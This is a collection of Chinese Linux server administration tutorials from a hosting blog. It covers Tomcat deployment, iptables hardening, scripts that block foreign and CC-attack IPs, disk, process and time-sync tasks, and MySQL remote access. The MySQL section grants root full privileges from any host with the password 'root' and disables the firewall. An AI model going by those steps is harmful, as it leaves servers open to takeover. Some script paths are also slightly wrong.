5、稍等片刻,就提示“安装完成”了,同时在tomcat版本下拉框中,也显示tomcat8已安装。 6、在Java项目管理器的项目管理中,我们单击“添加项目”,选择要部署的站点目录,如果没有的先在宝塔里创建个站点先吧,这里就不多讲解了。 选择好tomcat版本,填写完项目域名后,我们单击“确定”按钮即可。 7、项目添加完后,在操作栏,我们单击“映射”后单击“确定” 8、映射完成后,可以看到在网站管理里面,备注有类似的字样“tomcat[tomcat8]的映射站点” 9、通过站点域名,也能访问网站了 10、删除宝塔面板创建网站时创建的文件,上传我们的java项目,配置数据库之类的,就可以了访问java项目了,是不是很简单啊? #### Linux操作系统如何做安全加固设置 系统安全的基本原则,只启动需要的服务,只提供需要的端口访问,关注系统补丁更新 1.更新软件包 centos: yum update -y debian/ubuntu: apt update && apt upgrade -y #升级系统小版本 centos: yum upgrade -y 2.设置相对复杂的密码 建议密码包含字母,数字,符号,大小写,以及长度 3.修改默认远程端口 /etc/ssh/sshd_config Port 22000 systemctl restart sshd 4.防火墙设置 只放行常用的端口,如远程:22000(如果本地公网ip固定,最好设置只允许本地公网ip),web:80,ftp:21 禁用udp端口,只放行请求外部53端口 ubuntu/debian需安装: apt-get install iptables centos: /etc/sysconfig/iptables ubuntu: /etc/iptables.rules debian: /etc/iptables/rules.v4 参考规则: *filter :INPUT ACCEPT [0:0] :FORWARD ACCEPT [0:0] :OUTPUT ACCEPT [0:0] -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT -A INPUT -p icmp -j ACCEPT -A INPUT -i lo -j ACCEPT -A INPUT -p tcp -m state --state NEW -m tcp --dport 22000 -j ACCEPT -A INPUT -p tcp -m state --state NEW -m tcp --dport 80 -j ACCEPT -A INPUT -p tcp -m state --state NEW -m tcp --dport 21 -j ACCEPT -A INPUT -j REJECT --reject-with icmp-host-prohibited -A FORWARD -j REJECT --reject-with icmp-host-prohibited -A OUTPUT -p udp -m udp --dport 53 -j ACCEPT -A OUTPUT -p udp -j DROP COMMIT service iptables reload 或者 systemctl reload iptables debian导入iptables规则: /sbin/iptables-restore < /etc/iptables/rules.v4 5.不提供外部连接的服务监听回环ip 如redis,mysql,elasticsearch,memcache等 示例: /etc/redis/redis.conf bind 127.0.0.1 6.关闭系统不需要的服务 列出正在运行的服务: pstree   停止自启:  centos6: chkconfig postfix off centos7+/debian/ubuntu:  systemctl stop postfix ;systemctl disable postfix #### Linux服务器 如何屏蔽国外IP访问及简单的防CC攻击拦截 屏蔽国外IP访问 通过ssh远程登录服务器内,运行如下命令语句获取国内IP网段,会保存为/root/china_ssr.txt wget -q --timeout=60 -O- 'http://ftp.apnic.net/apnic/stats/apnic/delegated-apnic-latest' | awk -F\| '/CN\|ipv4/ { printf("%s/%d\n", $4, 32-log($5)/log(2)) }' > /root/china_ssr.txt 将下面脚本保存为/root/allcn.sh ,并设置可执行权限( 命令: chmod +x  allcn.sh)mmode=$1 CNIP="/root/china_ssr.txt" gen_iplist() {         cat <<-EOF                 $(cat ${CNIP:=/dev/null} 2>/dev/null) EOF } flush_r() { iptables  -F ALLCNRULE 2>/dev/null iptables -D INPUT -p tcp -j ALLCNRULE 2>/dev/null iptables  -X ALLCNRULE 2>/dev/null ipset -X allcn 2>/dev/null } mstart() { ipset create allcn hash:net 2>/dev/null ipset -! -R <<-EOF  $(gen_iplist | sed -e "s/^/add allcn /") EOF iptables -N ALLCNRULE  iptables -I INPUT -p tcp -j ALLCNRULE  iptables -A ALLCNRULE -s 127.0.0.0/8 -j RETURN iptables -A ALLCNRULE -s 169.254.0.0/16 -j RETURN iptables -A ALLCNRULE -s 224.0.0.0/4 -j RETURN iptables -A ALLCNRULE -s 255.255.255.255 -j RETURN iptables -A ALLCNRULE -m set --match-set allcn  src -j RETURN  iptables -A ALLCNRULE -p tcp -j DROP  } if [ "$mmode" == "stop" ] ;then flush_r exit 0 fi flush_r sleep 1 mstart 执行如下命令将开始拦截/root/allcn.sh 执行如下命令即可停止拦截/root/allcn.sh stop CC攻击拦截 方式1:通过netstat -an命令统计出当前请求并发大于100的IP,然后将不在白名单的IP自动加入DROP规则 首先运行 vi  deny_1.sh 添加以下命令语句#!/bin/bash if [[ -z $1 ]];then         num=100 else         num=$1 fi cd $(cd $(dirname $BASH_SOURCE) && pwd) iplist=`netstat -an |grep ^tcp.*:80|egrep -v 'LISTEN|127.0.0.1'|awk -F"[ ]+|[:]" '{print $6}'|sort|uniq -c|sort -rn|awk -v str=$num '{if ($1>str){print $2} fi}'` if [[ ! -z $iplist ]]; then         for black_ip in $iplist             do                                 ip_section=`echo $black_ip | awk -F"." '{print $1"."$2"."$3}'`                                 grep -q $ip_section ./white_ip.txt                 if [[ $? -eq 0 ]];then                                                 echo $black_ip >>./recheck_ip.txt                 else                                                 iptables -nL | grep $black_ip || iptables -I INPUT -s $black_ip -j DROP                         echo $black_ip >>./black_ip.txt                 fi            done fi 保存后执行以下语句:chmod +x deny_1.sh sh deny_1.sh 拦截的IP会记录到black_ip.txt中,如果有要排除的白名单IP,可将这些IP加入到white_ip.txt,一行一个。 方式2:通过web网站日志中攻击者访问特征,根据这些特征过滤出攻击的ip,利用iptables来阻止(排除本机IP:127.0.0.1)。 首先运行 vi deny_2.sh 添加以下命令语句:#!/bin/bash   OLD_IFS=$IFS   IFS=$'\n'   for status in `cat 网站访问日志路径 | grep '特征字符' | grep -v '127.0.0.1' | awk '{print $1}' |sort -n | uniq -c | sort -n -r | head -20`   do     IFS=$OLD_IFS     NUM=`echo $status | awk '{print $1}'`     IP=`echo $status | awk '{print $2}'`       if [ -z "`iptables -nvL | grep "dpt:80" | awk '{print $8}' | grep "$IP"`" ];then       if [ $NUM -gt 250 ];then         /sbin/iptables -I INPUT -p tcp  -s $IP --dport 80 -j DROP       fi     fi   done 保存后执行以下语句: chmod +x deny_2.sh sh deny_2.sh 最后使用crontab -e 添加到任务计划,每20分钟执行一次: */20 * * * * /root/deny_ip1.sh  >dev/null 2>&1 注意: 对于使用了百度云加速或其他cdn加速的,访问者IP可能会是CDN节点IP,刚不适用此方式进行拦截。 对于方式1 若发现和白名单同一个段IP出现在高并发列表,将不会直接拉黑,而是写入到recheck_ip.txt. 对于方式2 执行前建议先将原日志文件改名,以重新生成的新的日志文件为准。 不建议长时间进行拦截,请在一段时间后待服务器负载正常,攻击基本停止后及时取消拦截,恢复原先状态。 #### linux服务器/dev/mapper/centos-root系统盘满100%原因分析 最近有一客户使用这边高防服务器的时候反馈说系统盘老是满, 主机吧登陆宝塔后台的时候发现他的数据都是存在系统盘的,数据已经达15G了 登陆服务器查看文件后发现/dev/mapper/centos-root已经用了85%了,而数据盘2% 而主机吧看了下 这个客户的网站也就5G左右,而数据库更小,只有54MB,是什么导致系统盘爆涨呢? 我们查了下,发现全都是数据库日志文件占的,高达9G! 知道这个原因就好解决了,直接在宝塔里在宝塔里面关闭数据库产生的日志就可以了。进入软件管理,找到MYSQL,点设置,找到日志,点关闭即可。   关闭后这边查看系统盘,果然马上恢复了。 #### LINUX服务器ssh登陆必备工具:putty PuTTY是一个Telnet、SSH、rlogin、纯TCP以及串行接口连接软件。较早的版本仅支持Windows平台,在最近的版本中开始支持各类Unix平台,并打算移植至Mac OS X上。除了官方版本外,有许多第三方的团体或个人将PuTTY移植到其他平台上,像是以Symbian为基础的移动电话。PuTTY为一开放源代码软件,主要由Simon Tatham维护,使用MIT licence授权。随着Linux在服务器端应用的普及,Linux系统管理越来越依赖于远程。在各种远程登录工具中,Putty是出色的工具之一。Putty是一个免费的、Windows x86平台下的Telnet、SSH和rlogin客户端,但是功能丝毫不逊色于商业的Telnet类工具。 下载地址:putty 登陆流程: 1、输入IP地址,如果是共享IP的请输入远程连接的IP 2、输入端口,一般保持默认(22000),如果是共享IP的请输入远程连接的端口 3、点击“打开”。如图: 对应中文说明如图: 输入账号root,输入密码,登陆到linux。如图: #### linux服务器上传并配置jdk和tomcat的教程详解 准备工作 1.开启虚拟机 2. git工具 root账号登陆 使用root账号登陆 登陆后:使用linux命令: cd /opt/ 打开opt目录 mkdir app 在opt下创建app目录(压缩包解压到这儿) mkdir software在opt下创建software目录(上传的压缩包放在这儿) mkdir war 在opt下创建war 目录(上传的项目放在这儿) 关闭linux防火墙 防火墙相关设置 查看防火墙状态  service iptables status 关闭防火墙状态 service iptables stop 查看防火墙自状态 2-5都是on说明开机自启动状态 chkconfig iptables --list 关闭防火墙开机自启动 chkconfig iptables off 2-5都是off说明关闭成功 本地压缩包上传 在本地磁盘位置右键 git bash here 使用如下命令上传压缩包到linux服务器上: 1 2 scp apache-tomcat-7.0.79.tar.gz root@linux ip:/opt/software scp jdk-8u144-linux-x64.tar.gz root@linux ip:/opt/software 打开software目录 ll命令查看是否上传成功 解压到app目录下 linux命令如下: 1 2 tar -zxvf /opt/software/apache-tomcat-7.0.79.tar.gz -C /opt/app tar -zxvf /opt/software/jdk-8u144-linux-x64.tar.gz -C /opt/app  可cd/opt/app 打开app目录查看是否解压成功 配置 jdk 环境变量 打开etc/目录下profile文件 vim /etc/profile i 进入编辑状态 1 2 3 4 5 export JAVA_HOME=/opt/app/jdk1.8.0_144 export CLASSPATH=.:$JAVA_HOME/jre/lib/rt.jar:$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jar export CATALINA_HOME=/opt/app/apache-tomcat-7.0.79 export PATH=$PATH:$JAVA_HOME/bin:$CATALINA_HOME/bin:/usr/local/bin export LC_ALL=en_US.UTF-8 esc 退出编辑,shift + : wq 保存退出。 source /etc/profile 使环境变量配置生效。 检查jdk是否配置成功 总结 到此这篇关于linux上传并配置jdk和tomcat的文章就介绍到这了,更多相关linux jdk tomcat配置内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持主机吧! #### linux服务器上安装zookeeper 启动和关闭的教程 1.zookeeper运行需要java环境所以必须先装JDK2.下载,解压#wget http://mirrors.hust.edu.cn/apache/zookeeper/zookeeper-3.4.12/zookeeper-3.4.12.tar.gz#tar -zxvf zookeeper-3.4.12.tar.gz3.文件自己选择安装目录,接着进入conf,复制zoo_sample.cfg改名为zoo.cfg# cp zoo_sample.cfg zoo.cfg4.编辑zoo.cfg,增加2个目录在根目录#vi zoo.cfg#mkdir data #mkdir logs5.必须进入bin目录,才能输入以下内容启动程序#zkServer.sh  start   启动#zkServer.sh  status  查看状态#zkServer.sh  stop   停止/关闭6.想不进入bin目录输命令,需在/etc/profile 配置文件加入环境变量如下总结以上所述是小编给大家介绍的linux上安装zookeeper 启动和关闭,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对主机吧博客的支持! #### linux服务器中rz上传、sz下载文件命令介绍 这篇文章主要介绍了linux中rz上传、sz下载命令详解的相关资料,需要的朋友可以参考下rz,sz是便是Linux/Unix同Windows进行ZModem文件传输的命令行工具。使用前提:首先,你的Linux端(CentOS, Ubuntu)需要安装rz/sz命令,也就是 lszrz 包。其次,windows端需要支持ZModem的telnet/ssh客户端(Xshell,SecureCRT支持,好像putty不支持),SecureCRT就可以用SecureCRT登陆到Unix/Linux主机(telnet或ssh均可)运行命令rz,即是接收文件,xshell就会弹出文件选择对话框,选好文件之后关闭对话框,文件就会上传到linux里的当前目录。如果要上传文件,直接用鼠标点住文件往X-shell里面一拖即是运行命令 sz file 就是发文件到windows上(保存的目录是可以配置) 比ftp命令方便多了,而且服务器不用再开FTP服务了在Linux上安装lrzsz 单单是SSH客户端软件支持以上文件传输协议(ASCII,Xmodem,Ymodem,Zmodem)还不行,我们的Linux服务器上也得安装相应的软件,以支持这些文件传输协议才行。在Linux上,lrzsz就是完成此任务的,lrzsz就是一个支持 Zmodem 传输协议的工具。我们通过sz/rz两个命令,分别发送/接收文件。如果我们的系统中没有安装lrzsz这个包,就会报错,安装即可解决。[root@localhost ~]# rz -bash: rz: command not found ## For CentOS/RHEL [root@localhost ~]# yum -y install lrzsz    ## For Ubuntu # sudo apt-get install lrzsz 理解记忆 其中,对于sz和rz的理解与记忆我用了如下的方法(很多时候容易搞混):sz中的s意为send(发送),告诉客户端,我(服务器)要发送文件 send to cilent,就等同于客户端在下载。rz中的r意为received(接收),告诉客户端,我(服务器)要接收文件 received by cilent,就等同于客户端在上传。使用示例rz上传命令,如果已经存在文件了,那么默认不会执行上传,要-y覆盖才可以[root@szxjdw01-a-pro-14 ~]# cd /data/backup/war/ [root@szxjdw01-a-pro-14 war]# ll total 308888 -rw-r--r-- 1 root root 79681963 Aug 4 14:59 test.tar.gz [root@test war]# rz rz waiting to receive. Starting zmodem transfer. Press Ctrl+C to cancel. Transferring jdwin-ucenter-rpc-service-assembly.tar.gz... jdwin-ucenter-rpc-service-assembly.tar.gz was skipped    [root@test war]# rz -y rz waiting to receive. Starting zmodem transfer. Press Ctrl+C to cancel. Transferring jdwin-ucenter-rpc-service-assembly.tar.gz...  100%  77814 KB   855 KB/sec  00:01:31    0 Errors    [root@test war]# ll total 308888 -rw-r--r-- 1 root root 79681952 Aug 4 15:53 test.tar.gz 缺点 使用lszrz非常方便,但是有一点不足之处: 无法传输大于 4G 的文件。 那肿么办呢? 可以使用Filezilla, SecureFX 这些FTP工具来替代了。 #### Linux服务器初始化系统盘后重新挂载数据盘方法 在本篇文章中我们给大家分享了Linux初始化系统盘后重新挂载数据盘的解决方法,有需要的朋友们可以参考下。Linux实例初始化系统盘后重新挂载数据盘在Linux实例中,重新初始化系统盘不会改变数据盘里的内容,但是数据盘的挂载信息会丢失,所以,在Linux重启后,按以下步骤创建新的挂载点信息并挂载数据盘分区。说明:本文档中,假设初始化系统盘之前,实例上挂载的数据盘分区名称为/dev/vdb1,挂载点名称为/InitTest。查看数据盘挂载信息:运行命令 mount。返回结果中没有/dev/vdb1的信息。sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime) proc on /proc type proc (rw,nosuid,nodev,noexec,relatime) devtmpfs on /dev type devtmpfs (rw,nosuid,size=497476k,nr_inodes=124369,mode=755) securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime) tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev) devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000) tmpfs on /run type tmpfs (rw,nosuid,nodev,mode=755) tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,mode=755) cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,release_agent=/usr/lib/systemd/systemd-cgroups-agent,name=systemd) pstore on /sys/fs/pstore type pstore (rw,nosuid,nodev,noexec,relatime) cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices) cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio) cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_prio,net_cls) cgroup on /sys/fs/cgroup/memory type cgroup (rw,nosuid,nodev,noexec,relatime,memory) cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer) cgroup on /sys/fs/cgroup/hugetlb type cgroup (rw,nosuid,nodev,noexec,relatime,hugetlb) cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event) cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpuacct,cpu) cgroup on /sys/fs/cgroup/pids type cgroup (rw,nosuid,nodev,noexec,relatime,pids) cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset) configfs on /sys/kernel/config type configfs (rw,relatime) /dev/vda1 on / type ext4 (rw,relatime,data=ordered) systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=29,pgrp=1,timeout=0,minproto=5,maxproto=5,direct,pipe_ino=9791) hugetlbfs on /dev/hugepages type hugetlbfs (rw,relatime) mqueue on /dev/mqueue type mqueue (rw,relatime) debugfs on /sys/kernel/debug type debugfs (rw,relatime) tmpfs on /run/user/0 type tmpfs (rw,nosuid,nodev,relatime,size=101620k,mode=700) 查看数据盘分区信息:运行命令 fdisk -l。Disk /dev/vda: 42.9 GB, 42949672960 bytes, 83886080 sectors Units = sectors of 1 * 512 = 512 bytes Sector size (logical/physical): 512 bytes / 512 bytes I/O size (minimum/optimal): 512 bytes / 512 bytes Disk label type: dos Disk identifier: 0x0008d73a Device Boot  Start    End  Blocks Id System /dev/vda1 *   2048 83884031 41940992 83 Linux Disk /dev/vdb: 25.8 GB, 25769803776 bytes, 50331648 sectors Units = sectors of 1 * 512 = 512 bytes Sector size (logical/physical): 512 bytes / 512 bytes I/O size (minimum/optimal): 512 bytes / 512 bytes Disk label type: dos Disk identifier: 0xfe6d77c1 Device Boot  Start    End  Blocks Id System /dev/vdb1     2048 50331647 25164800 83 Linux 重新创建数据盘分区的挂载点:运行命令mkdir /InitTest说明:这里的挂载点名称必须与系统盘初始化之前/dev/vdb1的挂载点名称保持一致。您可以通过 cat /etc/fstab 命令查看原来的挂载点名称。重新挂载数据盘分区:运行命令mount /dev/vdb1 /InitTest查看挂载结果:运行命令df -h检测/dev/vdb1是否能自动挂载:卸载 /dev/vdb1:运行命令umount /dev/vdb1查看挂载信息:运行命令 mount。假如卸载成功,返回结果中不会有/dev/vdb1的信息。自动挂载/dev/vdb1:运行命令mount -a 查看挂载信息:运行命令 mount。假如自动挂载成功,返回结果中会有/dev/vdb1的信息。以上就是本次介绍的全部内容,感谢大家对主机吧的支持。 #### linux服务器启动和重启nginx教学 Nginx (engine x) 是一个高性能的HTTP和反向代理web服务器,同时也提供了IMAP/POP3/SMTP服务。Nginx是由伊戈尔·赛索耶夫为俄罗斯访问量第二的Rambler.ru站点(俄文:Рамблер)开发的,第一个公开版本0.1.0发布于2004年10月4日。 Nginx是一款轻量级的Web 服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器,在BSD-like 协议下发行。其特点是占有内存少,并发能力强,事实上nginx的并发能力确实在同类型的网页服务器中表现较好,中国大陆使用nginx网站用户有:百度、京东、新浪、网易、腾讯、淘宝等。 那么linux如何启动nginx? 1、进入nginx安装目录下的sbin目录下 2、执行以下命令: ./nginx -c /usr/local/nginx/nginx/conf/nginx.conf 说明: ● 其中/usr/local/nginx/nginx/conf/nginx.conf是你自己的nginx.conf路径。 ● -c参数指定了要加载的nginx配置文件路径。 linux如何重启nginx? 重新平滑启动: 1、进入nginx安装目录下的sbin目录下 2、执行以下命令: ./nginx -s reload #### Linux服务器如何时间同步设置 1.首先需了解linux内一任务计划工具crontab crontab可以定时去执行你要做的动作 直接用crontab命令编辑 crontab -u //设定某个用户的cron服务,一般root用户在执行这个命令的时候需要此参数 crontab -l //列出某个用户cron服务的详细内容 crontab -r //删除某个用户的cron服务 crontab -e //编辑某个用户的cron服务 一般使用crontab -e来编辑一个计划动作,编辑模式同vi编辑器相同 crontab内的基本编辑格式如下 *  *  *  *  *  command 分  时  日  月 周  命令 第1列表示分钟1~59 每分钟用*或者 */1表示 第2列表示小时1~23(0表示0点) 第3列表示日期1~31 第4列表示月份1~12 第5列标识号星期0~6(0表示星期天) 第6列要运行的命令 crontab文件的一些例子: 30 21 * * * /etc/init.d/smb restart 上面的例子表示每晚的21:30重启smb 。 45 4 1,10,22 * * /etc/init.d/smb restart 上面的例子表示每月1、10、22日的4 : 45重启smb 。 10 1 * * 6,0 /etc/init.d/smb restart 上面的例子表示每周六、周日的1 : 10重启smb 。 0,30 18-23 * * * /etc/init.d/smb restart 上面的例子表示在每天18 : 00至23 : 00之间每隔30分钟重启smb 。 0 23 * * 6 /etc/init.d/smb restart 上面的例子表示每星期六的11 : 00 pm重启smb 。 * */1 * * * /etc/init.d/smb restart 每一小时重启smb * 23-7/1 * * * /etc/init.d/smb restart 晚上11点到早上7点之间,每隔一小时重启smb 0 11 4 * mon-wed /etc/init.d/smb restart 每月的4号与每周一到周三的11点重启smb 0 4 1 jan * /etc/init.d/smb restart 一月一号的4点重启smb 2.寻找一个网络时间服务器,比如一些国家授时中心 台警大授时中心(台湾) asia.pool.ntp.org 中科院授时中心(西安) 210.72.145.44 上海交大 202.120.2.101 美国的 time.nist.gov 192.43.244.18 3.我们的电脑怎样去同步授时中心的时间 ntpdate asia.pool.ntp.org 上面此命令就是去同步授时中心的时间 如果要让系统每天23:00去同步,这样可以使用上面所将的crontab设置计划同步 如下命令 #crontab -e 进入crontab编辑模式,使用方法同vi 输入 0 23 * * * ntpdate asia.pool.ntp.org >> /var/log/ntpdate.log 保存退出 这样就完成了你的系统到每天23:00去asia.pool.ntp.org 同步时间,并将同步的日志放到 /var/log/ntpdate.log 下面补充一下系统时间的设置 date -s可以直接设置系统时间 比如将系统时间设定成1996年6月10日的命令如下。 #date -s 06/10/96 将系统时间设定成下午1点12分0秒的命令如下。 #date -s 13:12:00 注意,这里说的是系统时间,是linux由操作系统维护的。 在系统启动时,Linux操作系统将时间从CMOS中读到系统时间变量中,以后修改时间通过修改系统时间实现。为了保持系统时间与CMOS时间的一致性,Linux每隔一段时间会将系统时间写入CMOS。由于该同步是每隔一段时间(大约是11分钟)进行的,在我们执行date -s后,如果马上重起机器,修改时间就有可能没有被写入CMOS,这就是问题的原因。如果要确保修改生效可以执行如下命令。 #clock -w 这个命令强制把系统时间写入CMOS   #### linux服务器如何查看CPU性能指标 服务器变慢负载高时,需要先查看cpu负载是否过高,如果cpu负载高再看查看具体是什么进程占用cpu资源。一. cpu负载:    通过top命令查看:          主要看“load average”可理解为分别表示前 1、5、15分钟的平均负荷。通常1核的cpu不应超过4,如是4核cpu则不应超16(即:cpu核数 * 4),超过则说明负载较高存在异常。     其他参数说明如下:         us(user time)  表示CPU执行用户进程的时间,包括ni时间。通常我们只看这项。         sy(system time)  表示CPU在内核运行时间,包括IRQ和softirq时间,系统CPU占用率高,表明系统某部份存在瓶颈,通常值越低越好。         wa(waiting time)  CPI在等待I/O操作完成所花费的时间,系统不应该花费大量时间来等待I/O操作,否则说明I/O存在问题。         id(idle time)  系统处于空闲期,等待进程运行。         ni(nice time)  系统调整进程优先级所花费的时间。         hi(hard irq time)  系统处理硬中断所花费的时间。         si(softirq time)  系统处理软件中断所花费的时间。         st(steal time)  被强制等待虚拟CPU的时间,此时hypervisor在为另一个虚拟处理器服务。 二.查询占用cpu的进程     继续通过top命令查看 :     可以清楚发现php-fpm进程很占资源。php-fpm、mysql、httpd、nginx等都是站点web进程如存在大量的占用资源现象通常说明网站访问量大。这时可以开启网站的访问日志进行分析,一般来讲访问日志大的其网站占用资源也大。需要打开日志具体查看分析看是本身访问量大还是否存在异常访问所致(如:某类蜘蛛的大量爬行,某程序连接的执行异常,受cc攻击等)。 #### LINUX服务器如何查看进程 这篇文章主要介绍了LINUX查看进程的4种方法(小结),文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧 进程是在 CPU 及内存中运行的程序代码,而每个进程可以创建一个或多个进程(父子进程)。 **查看进程方法:** 第一种: 1 ps aux ps命令用于报告当前系统的进程状态。可以搭配kill指令随时中断、删除不必要的程序。ps命令是最基本同时也是非常强大的进程查看命令,使用该命令可以确定有哪些进程正在运行和运行的状态、进程是否结束、进程有没有僵死、哪些进程占用了过多的资源等等,总之大部分信息都是可以通过执行该命令得到的。 a:显示当前终端下的所有进程信息,包括其他用户的进程。 u:使用以用户为主的格式输出进程信息。 x:显示当前用户在所有终端下的进程。 示例: **上图中各字段解释:** USER:启动该进程的用户账号名称 PID:该进程的ID号,在当前系统中是唯一的 %CPU:CPU占用的百分比 %MEM:内存占用的百分比 VSZ:占用虚拟内存(swap空间)的大小 RSS:占用常驻内存(物理内存)的大小 TTY:该进程在哪个终端上运行。“?”表未知或不需要终端 STAT:显示了进程当前的状态,如S(休眠)、R(运行)、Z(僵死)、<(高优先级)、N(低优先级)、s(父进程)、+(前台进程)。对处于僵死状态的进程应予以手动终止。 START:启动该进程的时间 TIME:该进程占用CPU时间 COMMAND:启动该进程的命令的名称 **总结:ps aux 是以简单列表的形式显示出进程信息。** 第二种: 1 ps -elf -e:显示系统内的所有进程信息。 -l:使用长(long)格式显示进程信息。 -f:使用完整的(full)格式显示进程信息。 上图字段解释: 大部分跟第一种一样,PPID为父进程的PID。 第三种: 1 top 以全屏交互式的界面显示进程排名,及时跟踪包括CPU、内存等系统资源占用情况,默认情况下每三秒刷新一次,其作用基本类似于Windows系统中的任务管理器。 上图解释: Tasks(系统任务)信息:total,总进程数;running,正在运行的进程数;sleeping,休眠的进程数;stopped,中止的进程数;zombie,僵死无响应的进程数。 CPU信息:us,用户占用;sy,内核占用;ni,优先级调度占用;id,空闲CPU;wa,I/O等待占用;hi,硬件中断占用;si,软件中断占用;st,虚拟化占用。了解空闲的CPU百分比,主要看%id部分。 Mem(内存)信息:total,总内存空间;used,已用内存;free,空闲内存;buffers,缓存区域。 Swap(交换空间)信息:total,总交换空间;used,已用交换空间;free,空闲交换空间;cached,缓存空间。 第四种: 1 pstree -aup 以树状图的方式展现进程之间的派生关系,显示效果比较直观。 -a:显示每个程序的完整指令,包含路径,参数或是常驻服务的标示; -c:不使用精简标示法; -G:使用VT100终端机的列绘图字符; -h:列出树状图时,特别标明现在执行的程序; -H<程序识别码>:此参数的效果和指定"-h"参数类似,但特别标明指定的程序; -l:采用长列格式显示树状图; -n:用程序识别码排序。预设是以程序名称来排序; -p:显示程序识别码; -u:显示用户名称; 到此这篇关于LINUX查看进程的4种方法(小结)的文章就介绍到这了,希望大家以后多多支持主机吧! #### linux服务器如何查看防火墙iptables是否开启      linux系统服务器默认的防火墙是iptables,iptables是linux下的防火墙组件服务,相对于windows防火墙而言拥有更加强大的功能,此经验咗嚛以centos系统为例。关于iptables的一般常见操作,怎么来判断linux系统是否启用了iptables服务检查iptables是否安装 Linux下的防火墙iptables一般是系统集成的组件,检查是否安装可以通过 rpm -qa进行查询如果没有安装改组件,可以通过yum install iptables进行安装(必须联网)检查linux防火墙是否开启查询到iptables已经安装的话,对于iptables服务是否运行可以通过service  iptables status 如图(如果有其他组件如fail2ban也会调用防火墙规则) 后面就是规则链列出iptables规则如果要查看具体的iptables规则,也可以通过输入iptables -L 列出规则通过服务来判断 除了上面介绍的方法,还可以通过停止 iptables服务来判断(如图显示为确定xxx表示当前已经启用了iptables) 如果提示没有任何信息,表示当前系统没有启用iptables服务(进程)关闭iptables防火墙/删除规则Iptables开机自动启动如果要关闭iptables服务,还需要检查一下chkconfig列表里面是否有iptables的服务。关闭步骤: 先停止chkconfig iptables off 开机项目,然后移除,最后再查一次清除iptables规则如果只需要删除iptables防火墙规则,可以通过iptables-F 清除列表规则(iptables -L 列出当前的iptables规则)删除某条iptables规则,选择输入iptables -d  xxxx  ,启动iptables服务操作方法如图 #### Linux服务器无法远程连接数据库问题的解决方法 这篇文章主要给大家介绍了关于Linux中无法远程连接数据库问题的解决方法,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧。 起因 今天在ubuntu16.04环境下通过mysql workbench访问远程数据库时,发现无法连接问题,解决思路及方法记录如下,不足之处,请多指教。 问题 通过workbench输入密码访问时报这个错: ? 1 Your connection attempt failed for user 'root' from your host to server at 118.89.153.162:3306: Access denied for user 'root'@'118.89.153.162' (using password: YES) 思路 网络问题,更换网络之后重启workbench和MySQL服务进行连接,依旧是这个错。 密码错误,通过ssh远程登录服务器查看远程mysql的password,发现所填密码正确。 远程mysql没有访问权限,一般有两种方法:改表法和授权法   :  授权法: 第一步:尝试打开/etc/mysql/my.cnf配置文件,若文件不存在或者内容为空,则打开下面的文件路径: ? 1 2 3 sudo vim /etc/mysql/my.cnf //或: sudo vim /etc/mysql/mysql.conf.d/mysqld.cnf 第二步:在文件中查找下面一行,如果该行前没有加#,可在该行前添加#进行注释,保存退出。 ? 1 bind-address = 127.0.0.1 改表法: ? 1 2 3 4 5 6 7 8 mysql>use mysql; mysql>GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' WITH GRANT OPTION //赋予任何主机访问以及修改所有数据的权限 //例如,你想root用户使用root从任何主机连接到mysql服务器的话。 //GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION; //如果你想允许用户root从ip为192.168.1.124的主机连接到mysql服务器,并使用123456作为密码 //GRANT ALL PRIVILEGES ON *.* TO 'root'@'192.168.1.124'IDENTIFIED BY '123456' WITH GRANT OPTION; mysql>flush privileges //权限刷新,使修改立即生效 sudo /etc/init.d/mysql restart //或: service mysql restart 重启mysql服务 两种方法我尝试了一下,错误类型变成了: ? 1 Can't connect to MySQL server on ... 看到这个错误我想到了远程服务器防火墙的原因,于是我有了下面的思路: 4. 远程ubuntu服务器的防火墙原因导致无法本地访问远程的3306端口 ? 1 sudo ufw disable //关闭防火墙,该命令需在root权限下执行,慎用 再次通过workbench连接远程mysql,连接成功。 原因 我的本地无法连接远程是因为远程ubuntu服务器防火墙默认禁止外部访问3306端口。 做法 ? 1 2 sudo ufw enable //开启防火墙 sudo ufw allow 3306 //允许外部访问3306端口 总结 1. 一般的无法连接远程mysql问题是由上面四个愿意导致的,这里不做赘述。 2. 在遇到一个问题时首先要做的不是立刻找做法解决这个问题,而应该是思考为什么会出现这个问题,产生这个问题的原因,做到对症下药。 3. 自己还有很多不足,戒骄戒躁才能进步。 附赠 Ubuntu常用ufw防火墙命令 ? 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 //安装方法 sudo apt-get install ufw   //启用 sudo ufw enable sudo ufw default deny 